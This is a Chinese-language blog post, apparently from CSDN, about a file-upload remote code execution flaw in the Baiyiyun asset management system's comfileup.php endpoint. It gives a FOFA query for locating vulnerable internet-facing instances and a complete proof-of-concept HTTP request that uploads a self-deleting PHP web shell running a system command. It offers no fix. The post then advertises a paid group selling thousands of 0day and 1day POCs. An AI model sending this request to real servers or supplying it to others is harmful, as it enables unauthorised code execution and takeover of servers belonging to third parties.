百易云资产管理运营系统 comfileup.php 文件上传致RCE

最新推荐文章于 2024-08-31 19:21:08 发布
最新推荐文章于 2024-08-31 19:21:08 发布
阅读量458 收藏 4
点赞数 10
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jingke666/article/details/140703204
版权

介绍:

百易云是一家专注于物业不动产领域数字化系统研发及应用的国家高新技术企业。

主营业务有“智慧物管”、“智慧资管”,拥有自主研发技术及产品的数字物业厂商,总部研发位于长沙,目前业务已经成功拓展至深圳、上海、广州等一线城市,为客户提供在线化、数字化、智能化“三化合一”的专业化服务。

漏洞详情:

百易云资产管理运营系统 comfileup.php 存在文件上传漏洞,一旦攻击者利用文件上传漏洞成功上传了恶意文件,他们可以轻易地在服务器上执行任意代码,这可能导致服务器被完全控制,数据泄露,甚至使整个网络受到威胁。

fofa:

body="不要着急,点此"

poc:

POST /comfileup.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0)Gecko/20100101 Firefox/127.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=--------1110146050
 
----------1110146050
Content-Disposition: form-data; name="file";filename="rce.php"
 
<?php system("whoami");unlink(__FILE__);?>
----------1110146050--

 内部福利介绍-更新啦,网络安全百分之八十的资源都可以在这找到!涵盖了POC库、账号共享、文档库、资源网获取、会员专属群,做你的网络安全资源大全!

近期更新的0day/1day(包含公开和未公开漏洞-仅列举部分)漏洞整理更新至9000+

图片

👇内容太多扫描二维码查看详细介绍👇

图片

棉花糖网络安全圈
关注
  • 10
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
百易云资产管理运营系统 comfileup.php 文件上传RCE漏洞复现(XVE-2024-18154)
0xSec
07-25 1259
百易云资产管理运营系统 comfileup.php 接口存在文件上传漏洞,未经身份验证的攻击者通过漏洞上传恶意后门文件,执行任意代码,从而获取到服务器权限。
百易云资产管理运营系统comfileup.php接口存在任意文件上传漏洞 附POC
nnn2188185的博客
08-30 50
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发百易云资产管理运营系统
day5-HVV 某Windows 0day漏洞在anwang出售,可直接打穿系统
智慧网络病毒猎手的博客
07-31 597
众里寻他千百度,蓦然回首,那人却在,灯火阑珊处
「漏洞复现」百易云资产管理运营系统 comfileup.php 文件上传漏洞(XVE-2024-18154)
qq_39894062的博客
08-03 438
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
1day速达软件NET接口处存在RCE漏洞
weixin_43167326的博客
05-07 837
速达软件专注中小企业管理软件,产品涵盖进销存软件,财务软件,ERP软件,CRM系统,项目管理软件,OA系统,仓库管理软件等,是中小企业管理市场的佼佼者,提供产品、技术、服务等信息,百万企业共同选择。速达软件全系产品存在任意文件上传漏洞,未经身份认证得攻击者可以通过此漏洞上传恶意后门文件,执行任意指令,造成服务器失陷。
HW漏洞威胁情报第三天|HW情报
weixin_43167326的博客
07-25 595
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!天问物业ERP系统ContractDownLoad存在任意文件读取漏洞。猎鹰安全(金山)终端安全系统V9 远程代码执行漏洞。启明星辰天清汉马vpn存在任意文件读取漏洞。赛蓝企业管理系统存在任意文件上传漏洞。
常用电商系统优劣势对比—管易云、远丰电商、电商宝、海商、旺店通ERP、百数
bby2017的博客
09-24 4789
如今,各大电商行业已经风生水起,京东、天猫、淘宝各大电商商城已经无人不知无人不晓,那么面对每天滔滔不绝不绝的订单,你需要如果去处理呢?毋庸置疑,面对大批量的订单和各渠道的店铺,你肯定需要一个成熟实际而又强大的电商管理系统做支撑,来实现电商管理模式和运营模式的转型。 当下市场上的电商管理系统是管易云、远丰电商、电商宝、海商、旺店通ERP、百宝云等,这些是比较常见的,那么面对这几大做电商系统的公司呢...
百易控baykon称重控制仪表介绍 (2).docx
07-02
百易控Baykon是一家专注于称重控制仪表设计与制造的企业,其产品线涵盖了BX1、BX2、BX3以及BX10等多个型号,满足不同工业环境下的称重和灌装控制需求。 BX1称重仪表是一款高精度、多功能的通用仪表,通过OIML R76...
百易通智能办公开发平台源代码_14.3.8
03-10
百易通源代码 开发必读 (登录界面) (智能窗体开发界面) (源代码目录,当装好VS2013后,直接点开:e7.sln即可) 二次开发所涉及的核心目录: ioasoa目录:涉及到PC版表单功能的网页与资源,都放在里面。 ...
书店管理系统
06-23
1. 百易书店管理系统.exe:这是系统的主要执行程序,可能是用.NET Framework开发的Windows应用程序,封装了所有功能模块。 2. 说明_Readme.html:包含系统使用指南、安装步骤、常见问题解答等信息,帮助用户快速...
乾元通渠道商中标湖南省煤业集团公司安全生产预防和应急救援能力建设装备配备采购项目
QDLL123的博客
08-29 435
近日,乾元通渠道商中标湖南省煤业集团安全生产预防和应急救援能力建设装备配备采购项目,乾元通作为聚合通讯保障技术厂家,为项目一标段卫星通讯指挥车提供车载聚合路由器终端及系统
证券行业加密业务安全风险监测与防御技术研究
qq_61863348的博客
08-27 1279
摘要:解决证券⾏业加密流量威胁问题、加密流量中的应⽤⻛险问题,对若⼲证券⾏业的实际流量内容进⾏调研分析, 分析了证券⾏业加密流量⾯临的合规性⻛险和加密协议及证书本⾝存在的⻛险、以及可能存在的外部加密流量威 胁,并提出防御策略和措施。关键字:证券加密业务、加密应用、加密流量、商用密码安全评估、加密风险、加密威胁、监测防御数据爆发式增长的DT(Data technology)时代,加密技术是数据传输的重要保护手段。随着互联网和企业内部流量场景的加密化趋势快速增长,证券行业也面临着更加迫切的加密需求。证券行业涉及
k8s安全
ljj19910401的博客
08-29 818
Kubernetes(k8s)的安全机制是围绕保护其API Server来设计的,主要包括认证(Authentication)、鉴权(Authorization)和准入控制(Admission Control)三个核心环节。
Django框架安全
brucexia的专栏
08-29 1108
Django框架安全中包括了保护Django驱动的网站的建议,具体内容如下:1. 跨站点脚本(XSS)保护XSS攻击使用户可以将客户端脚本注入其他用户的浏览器中。只要在包含数据到页面中之前未对数据进行充分的清理,XSS攻击就可以源自任何不受信任的数据源,例如Cookie或Web服务。使用Django模板可保护站点免受大多数XSS攻击,但更重要的是要了解其提供的保护及其限制。Django模板会转义特定字符,这对于HTML来说尤其危险。尽管这可以保护用户免受大多数恶意输入的侵害,但这并不是绝对安全的。
【国铁采购平台-注册安全分析报告-无验证方式导致安全隐患】
最新发布
08-31 857
国铁采购平台电子招标采购系统”是中国国家铁路集团有限公司及所属企业指定的电子招标采购系统,运用大数据、云计算、互联网和人工智能技术,提高采购电子化水平,加强采购大数据分析,实现智慧采购和智能管理。,从平台的实力来看应该是非常雄厚,但好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“
23. 如何使用Collections.synchronizedList()方法来创建线程安全的集合?有哪些注意事项?
zhzjn的博客
08-31 692
复合操作是指多个操作组成的逻辑单元,如遍历集合和修改集合的操作结合在一起时。是在写操作时创建集合的副本,而读操作可以无锁进行,因此在读多写少的场景中具有较好的性能。在多线程环境下,选择合适的集合类型和同步机制至关重要,这取决于应用的具体需求和并发程度。确保了对单个方法调用的线程安全性,但在某些复合操作中(如遍历集合),仍然需要进行。如果在实际应用中存在大量并发读操作,而写操作较少,可以考虑使用其他并发集合类,如。,这些类提供了更细粒度的锁和更高效的并发处理机制,通常在高并发场景下表现更好。
网络安全-安全渗透简介和安全渗透环境准备
weixin_57370131的博客
08-26 1639
安全渗透简介和安全渗透测试环境准备。
等保2.0--安全计算环境--TiDB数据库
m0_60936698的博客
08-31 435
设置该变量时有最小值要求,最小值由其他几个相关的系统变量控制,即该变量的值不能设置为小于此表达式的值:validate_password.number_count+validate_password.special_char_count+(2*validate_password.mixed_case_count),口令的长度不能低于该变量的数值。TiDB是在需要高并发的场景经常见到的数据库,在大型的企业中会经常看到,虽然经常说他长得像MySQL数据库,但事实上其性能还是比较强的。(以上由文心一言生成)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值